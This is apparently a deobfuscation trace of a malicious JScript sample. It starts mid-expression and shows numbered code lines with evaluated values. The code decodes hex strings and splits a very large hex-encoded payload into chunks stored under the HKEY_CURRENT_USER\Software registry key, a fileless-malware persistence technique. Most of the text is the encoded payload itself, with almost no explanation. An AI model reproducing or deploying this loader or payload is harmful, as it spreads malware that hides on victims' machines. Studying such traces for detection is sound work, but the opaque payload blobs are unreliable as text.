5A304E585A3146585A7939435067414349674143494B3067507649535A7A7857596D4A53507A4E585A6A4E5751705648496949585A72396D64756C3063684A535073566D646C78474973566D646C786B62766C4764314E575A3456455A6C5233636C5658636C4A48506741434967414349674169434E346A497A596E4C744E5859363032626A3143646D393263764A33597031574C7A4657626C6832597A706A6279566E49394D6E6273314765674D585A6E564762705A58617942465A6C5233636C5658636C4A485067414349674143494B30675035525861795633596C4E485067414349676F51442B49694D323553627A466D4F7439325974516E5A764E3362794E5761743179636831575A6F4E326336346D63314A53507A35476274684849765A6D624A523363314A4864384143494B3067507649436377466D4C753957613046325970784763774655654E4A53506C315759754269497734434D75416A4C78495350753957617A4A585A32425365306C47647556475A4A6C48626931575A7A4E5859384143494B30675069416A4C78495350753957617A4A585A575233636C5A5761754657626749534D323553627A466D4F7439325974516E5A764E3362794E5761743179636831575A6F4E326336346D63314A53507A3547627468484935786D59745632637A4647504B3067434E347A50694D585A354A53506C3532627346475A754647647A4269493430695255566C4939636D62705232626A35575A6749434D75456A4939343262704E6E636C5A4849733147652F777A76372B4F41414141414141414141414141426F4F41414D4775414141417741674C414144417541414D41344341784141414134474176425161414D48417942515A41594641674151654177474169425162415547417A4277634145454142414143416744414141414D413443417741674C414144417541514D4141414175427762416B47417A4267634155474157424164414D47413142415A4138474179424155414541414941414E414141416E42675A415147416E42675A415147416E42675A415147414141414141554741744251594134454130427759415548416B4277624149484151425141416F414130414141414141416C424165415547417541414E414944417741674D415944417741414F414944414141515A413047416842676241554741734251614159454173425159413447417042775A416B474179427754414541414E4167514141414141414141414141417A4277614149484168425162415547416B4251594149484155424162414547416E42515A4177454142415141416F43414141414E414944417741674D414143416741517141414341304241614163474170426763416B484177427762414D454141414164416747416E42516141494841354241634138474144424162414547416E42515A41774541424167454167454141414141415547413442515A413443413041674D414144417941674E414144413441674D414141416C425162414547414F42416241454741754267634155474130426762416B454142415144416F44414141414D413443417741674C414144417541514D41414141".substr(18,2) ➔ "41"
                                              • parseInt("41",16) ➔ 65
                                              15
                                              }
                                                16
                                                return asciiString;
                                                  17
                                                  }
                                                    18
                                                    function splitAndSaveToRegistry(dataString) {
                                                    • splitAndSaveToRegistry("000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003306000000C000200100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0D0E397C626D656373716F2C3A0D0A0D0E3D2D20202A0D0E39736E65646E656075646F2C30202A0D0E397C626D65637371447E65646E656075646F2C302020202A0D0E3F20202020202020202A0D022A222D35676165776E616C602020202020202020202A0D0226646136636364343134363265393536322D3E656B6F6459756B43696C626570702020202020202020202A0D022A222D356275747365647968636271427F637375636F6270702020202020202020202A0D02203E203E203E26322D3E6F6963727566702020202020202020202A0D02237C6F62747E6F634D2E6F6D6D6F634E23777F646E69675E24766F637F6273696D422D356D616E602020202020202020202A0D0222333E6967722D35607974702020202020202020202A0D097479647E656469497C626D656373716C3020202020202A0D0E397C626D65637371447E65646E656075646C302020202A0D0E39736E65646E656075646C30202A0D0D2D212C30202A0D0E3D2D2029227564716C60246E616020585023777F646E6967582023776F6C61696460246E6160237C6F62747E6F63602E6F6D6D6F636023777F646E696750227F666023756D65686470256C62616E65402D2D212C30202A0D0A0D0E3D2D20202A0D0E3E6F69647163696C6070716F2C30202A0D0E33776E696474756353777F646E69677F2C302020202A0D0E35627167714960746F2C356572747E3223776E696474756353777F646E69675F253030323F294D435F2D6F636E24766F637F6273696D6E23716D656863637F2F2A30747478622D337E6C6D687025627167714960746C3020202020202A0D0E33776E696474756353777F646E69677C302020202A0D0E3223367E2D63716A3D6F636D24766F637F6273696D6D23716D656863637A3E6275722D337E6C6D68702E6F69647163696C6070716C30202A0D0D2D212C30202A0D0E3D2D202E2769666E6F636E207071602279656864702E6960272565727477202F6470276E69647475637027276E696A796375625F64757149607448676968437D627F6643777F646E6967556C62616E65472025686470247563702F637C61602020202020202A0D00246C657F6863702C276E69647475637023796864702F647E696024707F602471686470263E24302B627F67756D6162764024554E4E20276E6964756762716470237E6F69647163696C60707160237D627F664023777F646E6967502E2E696024707F602F64702020202020202A0D002465656E60247F6E602F6460246E616025627167716D29405440297C6C61636964716D6F6475716025627160237E6F69647163696C607071602926405758202E6F696471646E657F66402E6F696471647E65637562705023777F646E6967502E23794054402020202020202A0D0275686769686024716023777F646E69675029726024656C61636370297C6C61636964716D6F64757160256260247F6E602C6C696770246E616025627167716D294054402379602E6F69647163696C60707160256864702471686470237564716369646E69402D2D212C30202A0D0A0D0E3974796C6962696471607D6F636F2C30202A0D0E3E6F69647163696C6070716F2C302020202A0D0A0D0") ➔ undefined
                                                    19
                                                    var chunkSize = 19000;
                                                      20
                                                      var index = 0;
                                                        21
                                                        var registryPath = hexToAscii ( "484B45595F43555252454E545F555345525C536F6674776172655C" );
                                                        • hexToAscii("484B45595F43555252454E545F555345525C536F6674776172655C") ➔ "HKEY_CURRENT_USER\Software\"
                                                        22
                                                        while (dataString.length > 0 )
                                                          23
                                                          {
                                                            24
                                                            var chunk;
                                                              25
                                                              if ( dataString.length > chunkSize )
                                                                26
                                                                {
                                                                  27
                                                                  chunk = dataString.substr ( 0, chunkSize );
                                                                  • "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003306000000C000200100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0D0E397C626D656373716F2C3A0D0A0D0E3D2D20202A0D0E39736E65646E656075646F2C30202A0D0E397C626D65637371447E65646E656075646F2C302020202A0D0E3F20202020202020202A0D022A222D35676165776E616C602020202020202020202A0D0226646136636364343134363265393536322D3E656B6F6459756B43696C626570702020202020202020202A0D022A222D356275747365647968636271427F637375636F6270702020202020202020202A0D02203E203E203E26322D3E6F6963727566702020202020202020202A0D02237C6F62747E6F634D2E6F6D6D6F634E23777F646E69675E24766F637F6273696D422D356D616E602020202020202020202A0D0222333E6967722D35607974702020202020202020202A0D097479647E656469497C626D656373716C3020202020202A0D0E397C626D65637371447E65646E656075646C302020202A0D0E39736E65646E656075646C30202A0D0D2D212C30202A0D0E3D2D2029227564716C60246E616020585023777F646E6967582023776F6C61696460246E6160237C6F62747E6F63602E6F6D6D6F636023777F646E696750227F666023756D65686470256C62616E65402D2D212C30202A0D0A0D0E3D2D20202A0D0E3E6F69647163696C6070716F2C30202A0D0E33776E696474756353777F646E69677F2C302020202A0D0E35627167714960746F2C356572747E3223776E696474756353777F646E69675F253030323F294D435F2D6F636E24766F637F6273696D6E23716D656863637F2F2A30747478622D337E6C6D687025627167714960746C3020202020202A0D0E33776E696474756353777F646E69677C302020202A0D0E3223367E2D63716A3D6F636D24766F637F6273696D6D23716D656863637A3E6275722D337E6C6D68702E6F69647163696C6070716C30202A0D0D2D212C30202A0D0E3D2D202E2769666E6F636E207071602279656864702E6960272565727477202F6470276E69647475637027276E696A796375625F64757149607448676968437D627F6643777F646E6967556C62616E65472025686470247563702F637C61602020202020202A0D00246C657F6863702C276E69647475637023796864702F647E696024707F602471686470263E24302B627F67756D6162764024554E4E20276E6964756762716470237E6F69647163696C60707160237D627F664023777F646E6967502E2E696024707F602F64702020202020202A0D002465656E60247F6E602F6460246E616025627167716D29405440297C6C61636964716D6F6475716025627160237E6F69647163696C607071602926405758202E6F696471646E657F66402E6F696471647E65637562705023777F646E6967502E23794054402020202020202A0D0275686769686024716023777F646E69675029726024656C61636370297C6C61636964716D6F64757160256260247F6E602C6C696770246E616025627167716D294054402379602E6F69647163696C60707160256864702471686470237564716369646E69402D2D212C30202A0D0A0D0E3974796C6962696471607D6F636F2C30202A0D0E3E6F69647163696C6070716F2C302020202A0D0A0D0".substr(0,19000) ➔ "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003306000000C000200100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0D0E397C626D656373716F2C3A0D0A0D0E3D2D20202A0D0E39736E65646E656075646F2C30202A0D0E397C626D65637371447E65646E656075646F2C302020202A0D0E3F20202020202020202A0D022A222D35676165776E616C602020202020202020202A0D0226646136636364343134363265393536322D3E656B6F6459756B43696C626570702020202020202020202A0D022A222D356275747365647968636271427F637375636F6270702020202020202020202A0D02203E203E203E26322D3E6F6963727566702020202020202020202A0D02237C6F62747E6F634D2E6F6D6D6F634E23777F646E69675E24766F637F6273696D422D356D616E602020202020202020202A0D0222333E6967722D35607974702020202020202020202A0D097479647E656469497C626D656373716C3020202020202A0D0E397C626D65637371447E65646E656075646C302020202A0D0E39736E65646E656075646C30202A0D0D2D212C30202A0D0E3D2D2029227564716C60246E616020585023777F646E6967582023776F6C61696460246E6160237C6F62747E6F63602E6F6D6D6F636023777F646E696750227F666023756D65686470256C62616E65402D2D212C30202A0D0A0D0E3D2D20202A0D0E3E6F69647163696C6070716F2C30202A0D0E33776E696474756353777F646E69677F2C302020202A0D0E35627167714960746F2C356572747E3223776E696474756353777F646E69675F253030323F294D435F2D6F636E24766F637F6273696D6E23716D656863637F2F2A30747478622D337E6C6D687025627167714960746C3020202020202A0D0E33776E696474756353777F646E69677C302020202A0D0E3223367E2D63716A3D6F636D24766F637F6273696D6D23716D656863637A3E6275722D337E6C6D68702E6F69647163696C6070716C30202A0D0D2D212C30202A0D0E3D2D202E2769666E6F636E207071602279656864702E6960272565727477202F6470276E69647475637027276E696A796375625F64757149607448676968437D627F6643777F646E6967556C62616E65472025686470247563702F637C61602020202020202A0D00246C657F6863702C276E69647475637023796864702F647E696024707F602471686470263E24302B627F67756D6162764024554E4E20276E6964756762716470237E6F69647163696C60707160237D627F664023777F646E6967502E2E696024707F602F64702020202020202A0D002465656E60247F6E602F6460246E616025627167716D29405440297C6C61636964716D6F6475716025627160237E6F69647163696C607071602926405758202E6F696471646E657F66402E6F696471647E65637562705023777F646E6967502E23794054402020202020202A0D0275686769686024716023777F646E69675029726024656C61636370297C6C61636964716D6F64757160256260247F6E602C6C696770246E616025627167716D294054402379602E6F69647163696C60707160256864702471686470237564716369646E69402D2D212C30202A0D0A0D0E3974796C6962696471607D6F636F2C30202A0D0E3E6F69647163696C6070716F2C302020202A0D0A0D0"
                                                                  • "76665797653474746495B1001002000000001070001080571110100250103777F6278645E6F696470756368754E6F6E40716277561204500100010E10000000000800010808B081160400B081160404B0811604081811000402000003090201000409081100040800A0811010A081101803002C094210A0811010A081101803002D0C1D421800A0811010A0811019421500201801321818180400280942180100250C1D421801321818194216002C0E0A0100240C1D421E094213002809421A0100250C1D4219421200270800A0811010A081101803000C0E0A01000408120100040A0000030E08100E120100170E08181200050E0811000408110162151606080008230E0D1008240880821D1008260A00082308010100240E0D110100250880821D110100270880821D1000260A010100240A0000230880821D16050E0D1000240E080E02002508080E0200250E020100240B020100240B0101002408080B0200250A0201002408080A02002508080100240E0D160308711D16040C711D16040B06020706020000000204000000010404611603000E100E10100E1201001A0E000003050D150D1C1200070C611018086110181C61101E0C611012070002150D150D1E0200070E050D1100050E020100040E080E020005050D1E010005006211016215100008050D1D150D1100270E08150D1200260810150D18181300280E0E0E081300260818010024050D150D150D150D150D150D15002E0E01010024050D150D150D110300290A0602080E0102002508080018050D18050D1C411018050D18190A000319080018050D18050D1C411018050D18190A000318190100040908050D180818101E08181909000E0808050D1E081905000909080018050D1E081906000B090819020005090E0E081019040008080602050D160300000004040000000804000000000409060209521603004216030942115110180200280C1D421151101808094215002C090E01002401511E01002501511018080803002800321101002508180100040151101808081804000908081C321808140008003216030206020816020C3216030E000823015110082401511000240E0151110200260151160304321C110200260942110100250C1D4214321C194214002A081C110200250D221008040001020E0E0200050E0012010005090909020005050D1201000505110819080132150D19090807000C0808010004080018180200060808001808180400080801321818030007081000030E0101000404321C1102000601421C11020006050D1000040C1000030E0E0E0200050E0E0E010300060E0E0E050D110400080E0E0E0E010400070E0E0102000506110A0E0E0803000609080100040221080E0018080300070E0E0100040E0C1100040D31193215321C1204000A0D22110100050D221000040C160201321603083216030D22160309221D16040E0602042210080404221000040422160301221008040D1210080401221101000501221000040D12100004012216030D12160300031008240003100024000316030E0000230912100024080000230C12010024000E101101010037000E100E110100170512160308121008040412100804011210080408021008040C0210080408121000040412100004011210000408021000040C02100004010000030812110C121516070412110C121516070112110C121516070802110C121516070C02110C121516070980E439165C5A77B8010000230A3A05D11F7F5F30B80004CD9606E8E4C155A8462D4E5BEEE83A7000000004700070097002700360056004400F50025004400350013001300B40005F1000047009600E6009400F50035003500E4110000C600C6004600E200330037003700E600C5310000C600C6004600E20056005700C6007600A700F600D600C5910000C5008700F600260047003700F6000500C5310000C5002700560037007700F60027002400D6009600C6003500C5B10000C5004700E6005600270027005700340002008700F600660027005600470016007500C5520000C500E600F600F600D40002005600C60016000500C5710000C5008700F600660027005600260097003400C5510000C500E600F6007600160027004400560036009400C500F6004600F600D600F6003400C5520000C50097005600B600E600F600D400160056003500C5710000C5008700F6006600560027009600640002001600C600C6009600A700F600D400C5320000C5004600270096002600270056004600E60057008600450002001600C600C6009600A700F600D400C5B2000035005400C40094006400D400140025007400F400250005910000E6007700F60046004700570086003500F50035003500E49110000200A30047003700F6008400A000D000E600F600F600D4005600C600160005000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0F7000037005600C60096006600F60027000500C500E600F600F600D40002005600C60016000500C5003700E600F60096004700360057004600F6002700050002004600C600960086003600E600F600F600D41510000200A30047003700F6008400A000D0008700F600240047003700F60005000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7".substr(0,19000) ➔ "76665797653474746495B1001002000000001070001080571110100250103777F6278645E6F696470756368754E6F6E40716277561204500100010E10000000000800010808B081160400B081160404B0811604081811000402000003090201000409081100040800A0811010A081101803002C094210A0811010A081101803002D0C1D421800A0811010A0811019421500201801321818180400280942180100250C1D421801321818194216002C0E0A0100240C1D421E094213002809421A0100250C1D4219421200270800A0811010A081101803000C0E0A01000408120100040A0000030E08100E120100170E08181200050E0811000408110162151606080008230E0D1008240880821D1008260A00082308010100240E0D110100250880821D110100270880821D1000260A010100240A0000230880821D16050E0D1000240E080E02002508080E0200250E020100240B020100240B0101002408080B0200250A0201002408080A02002508080100240E0D160308711D16040C711D16040B06020706020000000204000000010404611603000E100E10100E1201001A0E000003050D150D1C1200070C611018086110181C61101E0C611012070002150D150D1E0200070E050D1100050E020100040E080E020005050D1E010005006211016215100008050D1D150D1100270E08150D1200260810150D18181300280E0E0E081300260818010024050D150D150D150D150D150D15002E0E01010024050D150D150D110300290A0602080E0102002508080018050D18050D1C411018050D18190A000319080018050D18050D1C411018050D18190A000318190100040908050D180818101E08181909000E0808050D1E081905000909080018050D1E081906000B090819020005090E0E081019040008080602050D160300000004040000000804000000000409060209521603004216030942115110180200280C1D421151101808094215002C090E01002401511E01002501511018080803002800321101002508180100040151101808081804000908081C321808140008003216030206020816020C3216030E000823015110082401511000240E0151110200260151160304321C110200260942110100250C1D4214321C194214002A081C110200250D221008040001020E0E0200050E0012010005090909020005050D1201000505110819080132150D19090807000C0808010004080018180200060808001808180400080801321818030007081000030E0101000404321C1102000601421C11020006050D1000040C1000030E0E0E0200050E0E0E010300060E0E0E050D110400080E0E0E0E010400070E0E0102000506110A0E0E0803000609080100040221080E0018080300070E0E0100040E0C1100040D31193215321C1204000A0D22110100050D221000040C160201321603083216030D22160309221D16040E0602042210080404221000040422160301221008040D1210080401221101000501221000040D12100004012216030D12160300031008240003100024000316030E0000230912100024080000230C12010024000E101101010037000E100E110100170512160308121008040412100804011210080408021008040C0210080408121000040412100004011210000408021000040C02100004010000030812110C121516070412110C121516070112110C121516070802110C121516070C02110C121516070980E439165C5A77B8010000230A3A05D11F7F5F30B80004CD9606E8E4C155A8462D4E5BEEE83A7000000004700070097002700360056004400F50025004400350013001300B40005F1000047009600E6009400F50035003500E4110000C600C6004600E200330037003700E600C5310000C600C6004600E20056005700C6007600A700F600D600C5910000C5008700F600260047003700F6000500C5310000C5002700560037007700F60027002400D6009600C6003500C5B10000C5004700E6005600270027005700340002008700F600660027005600470016007500C5520000C500E600F600F600D40002005600C60016000500C5710000C5008700F600660027005600260097003400C5510000C500E600F6007600160027004400560036009400C500F6004600F600D600F6003400C5520000C50097005600B600E600F600D400160056003500C5710000C5008700F6006600560027009600640002001600C600C6009600A700F600D400C5320000C5004600270096002600270056004600E60057008600450002001600C600C6009600A700F600D400C5B2000035005400C40094006400D400140025007400F400250005910000E6007700F60046004700570086003500F50035003500E49110000200A30047003700F6008400A000D000E600F600F600D4005600C600160005000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0F7000037005600C60096006600F60027000500C500E600F600F600D40002005600C60016000500C5003700E600F60096004700360057004600F6002700050002004600C600960086003600E600F600F600D41510000200A30047003700F6008400A000D0008700F600240047003700F60005000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7"
                                                                  • "005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D097000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F6002700240047003700F60086007400C55510000200A30047003700F6008400A000D000D60057009600D600F6002700860034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0F710000200A30047003700F6008400A000D000E600F600270094000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D077000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500D60057009600D600F600270086003400C5D410000200A30047003700F6008400A000D00096004600C60016006700960065000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C50096004600C6001600670096006500C5B410000200A30047003700F6008400A000D000D6005700960046009600270094000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500D600570096004600960027009400C5B410000200A30047003700F6008400A000D00047005600A600D6009600C60035000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C50047005600A600D6009600C6003500C5B410000200A30047003700F6008400A000D000D60057004700960026002700F4000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500D60057004700960026002700F400C5B410000200A30047003700F6008400A000D000150015000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D037000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F6002700240015001500C5004700E60056003600E60056004500C5F510000200A30047003700F6008400A000D000E6001600270055000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D077000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500E600160027005500C5001600960046005600D400A700F60034005700C59510000200A30047003700F6008400A000D0003600F60034003600F60034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0B7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F60027002400C5003600F60034003600F6003400C59510000200A30047003700F6008400A000D000E600F6007700F600F60034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D2".substr(0,19000) ➔ "005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D097000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F6002700240047003700F60086007400C55510000200A30047003700F6008400A000D000D60057009600D600F6002700860034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0F710000200A30047003700F6008400A000D000E600F600270094000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D077000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500D60057009600D600F600270086003400C5D410000200A30047003700F6008400A000D00096004600C60016006700960065000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C50096004600C6001600670096006500C5B410000200A30047003700F6008400A000D000D6005700960046009600270094000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500D600570096004600960027009400C5B410000200A30047003700F6008400A000D00047005600A600D6009600C60035000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C50047005600A600D6009600C6003500C5B410000200A30047003700F6008400A000D000D60057004700960026002700F4000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500D60057004700960026002700F400C5B410000200A30047003700F6008400A000D000150015000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D037000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F6002700240015001500C5004700E60056003600E60056004500C5F510000200A30047003700F6008400A000D000E6001600270055000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D077000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500E600160027005500C5001600960046005600D400A700F60034005700C59510000200A30047003700F6008400A000D0003600F60034003600F60034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0B7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F60027002400C5003600F60034003600F6003400C59510000200A30047003700F6008400A000D000E600F6007700F600F60034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D2"
                                                                  • "D200020044009400020037007600F600C4000200460027001600F600260007009600C60034000200D20002F200005600470016005600270034D0000042006500440005004500640052F00000E3000700470047008600C3D0000007004700470086900000E300E200C3700000E2301000D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200A000D000A000D0D60000A000D000A000D000A000D0D00000A000D0005600B6001600E60035000200C700025100000200C7000200460027001600F600260007009600C6003491000097004700960034900000560046005700470096007600E600F600C43100005600460057004700960047001600C411000056004600F6003400970027004700E6005700F600347100005600E600F600A5005600D6009600451100005600D6001600E400E600F6009600760056002551000056004600F6003400E600F60096007600560025510000D700C600C6005700E400B7D000005600D6001600E400970027004700E6005700F6003471000046001600F600C4900000F200C600D6008700F20076002700F600E20007009600F6005600760056005600270066009700C600C600160056002700F200F200A3003700070047004700861400000200A300370037005600270046004600140002000500940002004700E600560027002700570034920000E300C600D60047008600F200C300E30097004600F6002600F200C3D10000E30097004600F6002600C300E3004600160056008600F200C300E3005600C600470096004700F200C300B600360056008600340002000500940002004700E60056002700270057003400E3005600C600470096004700C300E3004600160056008600C300E300C600D60047008600C3170000F20076002700F600E2003700E6004600E60097004600E20007009600B6003600560086003600F200F200A300070047004700865300009200B3005300030073003300E2000300E20013002500C4003400020045005400E400E2000200B3002300E200530002004500E400020037007700F6004600E600960075000200B3000300E20063000200540094003500D4000200B3005600C60026009600470016000700D600F6003600820002000300E2004300F2001600C600C6009600A700F600D4B80810004700E600560076001600D20027005600370057510000240074000200D70023006600A3000300B73100000200F2000270000024007400027010008300D2006600470057B00000D300470087005600470062D00000D30046009600F5004700160086003600F300560076001600370037005600D4004600E60056003700F2B200002400A4005400B600E6007700D400340014003700770096009700A4002700E600F40034002700E600E6B2000045003500F40005901000A000D000D200D200D7000300B700D200D200A000D000D7003300B700A000D000A000D000D7002300B7000200A3005600070097004500D2004700E60056004700E600F6003400A000D0002200D7001300B7002200D3005600D6001600E6005600C600960066000200B30022004700E6005600D60057003600F60046002200D3005600D6001600E6000200B3001600470016004600D200D6002700F60066000200A300E600F6009600470096003700F6000700370096004400D2004700E60056004700E600F6003400A000D000D7000300B700D200D27D081000D3009700270016004600E6005700F60026000200B3001600470016004600D200D6002700F6006600F200470027001600070096004700C6005700D6D310005600070097004500D2004700E60056004700E600F6003491000087301000D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200